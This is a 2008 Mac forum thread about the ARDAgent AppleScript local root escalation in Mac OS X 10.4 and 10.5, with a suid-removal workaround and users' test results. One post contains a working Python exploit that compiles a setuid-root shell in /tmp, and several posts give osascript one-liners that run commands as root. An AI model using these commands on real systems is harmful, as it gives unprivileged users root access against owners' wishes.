Mac OS X Local root escalation vulnerability

Discussion in 'macOS' started by zorinlynx, Jun 18, 2008.

  1. zorinlynx macrumors 601

    zorinlynx

    Joined:
    May 31, 2007
    Location:
    Florida, USA
    #1
    From Slashdot:

    "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not."

    If you administrate Mac OS X systems in a lab environment where local users shouldn't be able to get root, this can affect you. Thankfully for most of us, the user must be logged in *locally* (into the window system) for this to work.

    A quick workaround is to remove the suid bit on the ARDAgent:

    sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

    This may be undone by repair permissions, though, and possibly breaks Remote Desktop, so keep an eye on it until Apple officially patches the bug.
     
  2. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #2
    Local privilege escalation.

    Code:
    #!/usr/bin/python
    
    import commands
    payload="echo 'int main() { setuid(0); setgid(0); seteuid(0); system(\"/bin/sh -i\"); }' > /tmp/r00t.c"
    buildcmd="gcc /tmp/r00t.c -o /tmp/r00ted"
    escalate="osascript -e 'tell app \"ARDAgent\" to do shell script \"chown root /tmp/r00ted; chmod 4777 /tmp/r00ted\"'"
    print 'Building your shell', commands.getoutput(payload), commands.getoutput(buildcmd)
    print commands.getoutput(escalate)
    
    print "r00t is located at /tmp/r00ted"
    
    Have fun.
     
  3. cdlxxvi macrumors newbie

    Joined:
    Apr 30, 2008
    #3
    Don't worry, guys, knowing Apple's serious treating of known vulnerabilities (Safari carpet bombing being the prime example), we can expect an update any year now :rolleyes:
     
  4. Phil A. Moderator

    Phil A.

    Staff Member

    Joined:
    Apr 2, 2006
    Location:
    Shropshire, UK
    #4
    There is no way of defending this - it is a massive hole and Apple should hang their heads in shame. Why the hell does ARDAgent have the SUID bit set when it can run shell scripts?!
    It would be trivial to use this exploit to install a trojan with root privileges and without and secondary authentication and the question has to be are there any more of these hidden away in OS X?
    The Apple world just got a bit more dangerous...
     
  5. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #5
    I would consider all binaries that Apple has given SUID bits to suspect. They've proven that they can't be trusted with them.

     
  6. subaqua macrumors member

    Joined:
    Jan 15, 2008
    Location:
    Minneapolis
    #6
    I cannot reproduce this on my Leopard system:

    (spartan) ~ % osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
    23:47: execution error: ARDAgent got an error: "whoami" doesn’t understand the do shell script message. (-1708)

    (spartan) ~ % uname -a
    Darwin spartan.example.com 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386

    My copy of ARDAgent has the suid bit set but I don't appear to be vulnerable...

    (spartan) ~ % ls -l /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
    -rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent*


    I am logged into the desktop running the above commands from terminal app.

    Was this fixed in 10.5.1, 10.5.2, or 10.5.3 already?

    Dan
     
  7. priller macrumors regular

    Joined:
    Dec 15, 2007
    #7
    Still worked with 10.5.3 for me

    gamma:~ priller$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';

    root
     
  8. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #8
    None of those are scriptable.
     
  9. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #9
    Who said that they needed to be scriptable? You've got your blinders on.
     
  10. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #10
    If Remote Desktop is enabled ARDAgent will already be running as the local user, launchd ignores setuid.
     
  11. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #11
    The OP. Don't post what you don't understand.
     
  12. Random Chaos macrumors member

    Joined:
    Jan 16, 2008
    #12
    And as was said, fully exploitable via scripts. For instance, make a nicely trusted AppleScript, saved as an Application:

    Code:
    on run
    	do shell script "osascript -e 'tell app \"ARDAgent\" to do shell script \"say quack\"'"
    end run
    
    You'll notice that it says it with the default voice, not the one set for your account.

    So how long before we see malware or trojans?
     
  13. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #13
    You don't need to use osascript if you're already in an applescript!

    Code:
    on run
    	tell app "ARDAgent" to do shell script \"say quack\"
    end run
    
     
  14. SC68Cal macrumors 68000

    Joined:
    Feb 23, 2006
    #14
  15. mojococo macrumors newbie

    Joined:
    Jun 19, 2008
    #15
    If you have something useful to say about setuid binaries, post it.
     
  16. martychang macrumors regular

    Joined:
    Sep 3, 2007
    #18
    That MOAB 15 bug is scary stuff :eek:
    I read Rixstep regularly so I'm not entirely sure how I missed that.

    I want to love you Apple, but you make it so hard :(
     
  17. Iroganai macrumors regular

    Iroganai

    Joined:
    Oct 18, 2003
    #19
    First, this should be posted on the top page of Macrumors.
    Second, to SC68CAL, "do shell script" is not really the functionality of ARDagent; it is there FOR ANY SCRIPTABLE APP as a part of the AppleScript-ability and any GUI app which is registered to LaunchServices can be sent an AppleEvent.
    Apple is to blame to have AppleScript-ability for the setuid apps. It's a gaping hole in the security !

    In your list of setuid'ed executables, the only other GUI app is check_afp.app.
    But
    Code:
    osascript -e 'tell app "check_afp" to do shell script "whoami" '
    didn't "work" on my machine. Mmm ...
     
  18. lugesm macrumors 6502a

    lugesm

    Joined:
    Sep 7, 2007
    #20
    For a relative Mac newbie most of the above posts read like Greek. :confused:

    Can anyone tell me if there is a simple way to detect if the Trojan is already on my system?
     
  19. martychang macrumors regular

    Joined:
    Sep 3, 2007
    #21
    Not really, any Malware's first goal, trojan or otherwise, is to make sure nobody can see it. This is why Windows users have such problems, even when they run all kinds of security programs: you basically have to be familiar with what's supposed to be on the system, and spot things that look fishy.
     

Share This Page